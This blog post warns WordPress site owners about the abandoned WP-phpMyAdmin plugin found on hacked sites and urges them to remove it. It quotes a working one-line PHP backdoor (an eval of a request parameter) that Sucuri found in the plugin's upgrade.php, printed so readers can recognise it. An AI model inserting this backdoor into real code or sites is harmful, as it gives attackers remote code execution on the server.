WordPress Security Alert: Hacked WP-phpMyAdmin plugin — found vulnerable backdoor. Remove it!
Over the past few weeks, I have been cleaning several hacked WordPress sites for clients and found a commonality, the WP-phpMyAdmin plugin. This caught my eye because I don't see this plugin being used very often.
I began to wonder, is the WP-phpMyAdmin plugin vulnerable? And asked myself, why would a webmaster use this plugin to access their database?
I asked one of the victim's of hacker attacks why he had this plugin installed. He stated:
“We use the WP-phpMyAdmin plugin on all of our WordPress sites so we can remove WordPress post revisions easily.”
No offense to the webmaster and I understand the ease of having everything inside your Dashboard, but there are other ways to easily remove the post revisions from the database.
The best way is to log-in to your phpMyAdmin and delete them by running a simple SQL query. And if you're not comfortable with working directly inside the database, there are plugins that control and/or delete post revisions for you.
Why is the WP-phpMyAdmin Plugin vulnerable?
I did a search in the WordPress.org plugin repository for WP-phpMyAdmin and found the plugin has been removed — Yikes! Say it with me, “Warning! Red flag Alert!“
So I viewed the Google cached page (wordpress.org/extend/plugins/wp-phpmyadmin/), dated June 20, 2011.
As you can see by my screen shot above, the WP-phpMyAdmin (version 2.10.3) was last updated on 8-20-2007 — “Red Flag Alert!” What? It requires WordPress version 1.5 or higher and compatible up to WP 2.2.2. Holy cats! This plugin belongs in an old-folks home.
So now I'm wondering, what happened to this plugin and why was it removed? Is it still being supported by the developer? Or is he sipping on margaritas on a Caribbean island somewhere?
I visited the developer's website and on his post dated 1/17/2011 it reads:
After 3 years of absence from the tech-blogging scene I am doing it again. I’v been blogging about all things WordPress over at wordpress.designpraxis.at, where i used to maintain several WordPress plugins. So this post also functions as a landing page for redirects from there.
My activities have been going to other directions as you can see when looking around on this very site. So the topics I’ll be blogging here will mainly be on jQuery, Web-Development in general mostly related top front-end topics like CSS and XHTML.
To all of you, being asking what will happen to my WordPress plugins: You are welcome to take over development, just as April from springthistle is about to do with BackUpWordPress. Thanks April!
Big red flag – this plugin hasn't been supported by the developer for the last 3 years.
If you're one of the unfortunate 56,405 WordPress users that downloaded this plugin, please tell me that you're not still using it.
The biggest red flag for me was when I read David Dede's (of Sucuri.net) blog post where he found a backdoor on all the infected websites he examined.
On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:
<?php if(isset($_REQUEST[“asc”]))eval(stripslashes($_REQUEST[“asc”])); ?>
This is not part of the plugin, and should be removed immediately!
The code snippet above is a backdoor and allows remote access to the affected sites with it installed.
Dede also stated in his blog post that he had a conversation with Andrew Nacin, a WordPress Core Developer on the reason why the WP-phpMyAdmin plugin was removed from the WordPress plugin repository:
The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.
I'd like to thank the WordPress.org team for removing this vulnerable plugin from their repository.
In conclusion from my very long and drawn out post, my recommendation is that if you have the WP-phpMyAdmin plugin installed on your WordPress blog, run over to your blog right now and deactivate it. Then completely remove it from your website.
Please be careful with your WordPress plugins. Pay close attention to the date it was last updated and WP version requirements and compatibility. And keep them up to date. If you don't have time to check, make time or have a professional do it for you.
My advice: Don't use a plugin that is not supported in the WordPress plugin repository or at the very least, currently supported by its developer.
Leave Your Feedback
Are you using or have you used the WP-phpMyAdmin plugin? If so, why would you use it on your site? Has your site been infected with malware with this plugin installed? Let us know, leave your comment below.